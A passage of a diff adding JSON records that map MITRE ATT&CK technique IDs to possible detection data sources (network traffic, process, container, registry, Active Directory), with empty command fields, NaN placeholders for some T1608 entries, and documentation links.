This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + null + ] + }, + { + "technique_id": "T1204.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container start", + "description": "A container was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "container" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": 
"command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "image", + "definition": "Information about a virtual machine image.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "image creation", + "description": "An image was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "image" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance creation", + "description": "An instance was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about 
a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "ran", + "target_data_element": "instance" + }, + { + "data_source": "instance", + "definition": "Information about a virtual system within a cloud environment.", + "collection_layers": [ + "cloud" + ], + "data_source_platform": [ + "IaaS" + ], + "data_component": "instance start", + "description": "An instance was started.", + "source_data_element": "user", + "relationship": "redeployed", + "target_data_element": "instance" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource", + "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + ], + [ + "https://aws.amazon.com/ec2/?ec2-whats-new.sort-by=item.additionalFields.postDateTime&ec2-whats-new.sort-order=desc", + "https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/", + "https://cloud.google.com/compute/docs/instances" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] 
+ }, + { + "technique_id": "T1610", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container start", + "description": "A container was started.", + "source_data_element": "user", + "relationship": "started", + "target_data_element": "container" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod creation", + "description": "A pod was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "pod" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod modification", + "description": "A pod was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "pod" + }, + { + "data_source": "pod", + "definition": "Information about a pod within a containerized environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "pod modification", + "description": "A pod was modified.", + "source_data_element": "user", + "relationship": 
"deployed container in", + "target_data_element": "pod" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.docker.com/engine/api/v1.41/#tag/Container" + ], + [ + "https://kubernetes.io/docs/reference/kubectl/kubectl/", + "https://kubernetes.io/docs/reference/generated/kubernetes-api/v1.19/#pod-v1-core" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1608.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + 
"definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.002", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1608", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1016.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was 
created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface 
and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1555.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can 
be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1484.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object creation", + "description": "An active directory object was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + 
"data_component": "active directory object deletion", + "description": "An active directory object was deleted", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "ad object" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + 
"https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.014", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", 
+ "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + 